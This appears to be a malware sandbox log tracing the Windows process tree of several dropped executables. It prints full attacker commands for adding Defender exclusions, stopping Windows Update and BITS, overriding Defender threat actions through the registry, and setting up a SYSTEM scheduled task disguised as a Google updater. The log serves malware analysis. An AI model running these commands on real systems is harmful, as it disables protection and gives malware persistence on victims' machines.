C:\Users\Admin\AppData\Local\Temp\kos2.exe"C:\Users\Admin\AppData\Local\Temp\kos2.exe"3⤵
- Executes dropped EXE
PID:3676 -
C:\Users\Admin\AppData\Local\Temp\set16.exe"C:\Users\Admin\AppData\Local\Temp\set16.exe"4⤵
- Executes dropped EXE
PID:5904 -
C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp"C:\Users\Admin\AppData\Local\Temp\is-SRS6D.tmp\is-U2MH6.tmp" /SL4 $E0112 "C:\Users\Admin\AppData\Local\Temp\set16.exe" 1281875 522245⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
PID:2392 -
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" helpmsg 206⤵PID:5760
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 helpmsg 207⤵PID:6128
-
-
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -i6⤵
- Executes dropped EXE
PID:5536
-
-
C:\Program Files (x86)\MyBurn\MyBurn.exe"C:\Program Files (x86)\MyBurn\MyBurn.exe" -s6⤵
- Executes dropped EXE
PID:6132
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\system32\schtasks.exe" /Query6⤵PID:4956
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\K.exe"C:\Users\Admin\AppData\Local\Temp\K.exe"4⤵
- Executes dropped EXE
PID:4552
-
-
-
C:\Users\Admin\AppData\Local\Temp\latestX.exe"C:\Users\Admin\AppData\Local\Temp\latestX.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Drops file in Program Files directory
PID:6136
-
-
-
C:\Users\Admin\AppData\Local\Temp\ED12.exeC:\Users\Admin\AppData\Local\Temp\ED12.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
PID:5776
-
-
C:\Users\Admin\AppData\Local\Temp\EFF1.exeC:\Users\Admin\AppData\Local\Temp\EFF1.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:5900 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5900 -s 7563⤵
- Program crash
PID:1136
-
-
-
C:\Users\Admin\AppData\Local\Temp\28C5.exeC:\Users\Admin\AppData\Local\Temp\28C5.exe2⤵
- Executes dropped EXE
PID:4980 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe3⤵PID:6032
-
-
-
C:\Users\Admin\AppData\Local\Temp\3028.exeC:\Users\Admin\AppData\Local\Temp\3028.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
PID:5748 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"3⤵PID:68
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 68 -s 5804⤵
- Program crash
PID:5520
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵PID:1752
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:1112
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:6116
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:6112
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:1000
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3684
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5808
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵PID:4164
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:3904
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:2492
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:4632
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:6220
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:6272
-
-
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵PID:7060
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:1496
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵PID:4416
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6400
-
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:2452
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:6452
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:5032
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:5240
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:5744
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:6420
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:6520
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵PID:5448
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2320
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:6580
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:6644
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:976 -
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵PID:500
-
-
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵PID:3948
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:7096
-
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3728
-
C:\Windows\system32\browser_broker.exeC:\Windows\system32\browser_broker.exe -Embedding1⤵
- Modifies Internet Explorer settings
PID:2668
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:2728
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4056
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4888
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:1116
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
PID:3332
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4184
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2648
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:192
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2732
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4436
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:4472
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5428
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5488
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5928
-
C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca1⤵
- Modifies registry class
PID:5332
-
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exeC:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe1⤵
- Executes dropped EXE
PID:5832
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:1060 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:5604
-
-
\??\c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc1⤵PID:5608
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:5804
-
\??\c:\windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:5052
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:7112
-
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exeC:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\fydFwya.exe 3Y /Tzsite_idQqV 385119 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:7068 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:3836 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵PID:5532
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵PID:5948
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵PID:6400
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵PID:6408
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵PID:3384
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵PID:3936
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵PID:3960
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵PID:4972
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵PID:6424
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵PID:6432
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵PID:6476
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵PID:6464
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵PID:6488
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵PID:6556
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵PID:6604
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵PID:6656
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵PID:6744
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵PID:6796
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵PID:6280
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵PID:2504
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵PID:6832
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵PID:6916
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵PID:1020
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵PID:6908
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵PID:6876
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵PID:5480
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵PID:6008
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵PID:7000
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
- Suspicious use of SetThreadContext
PID:4980
-
-
-
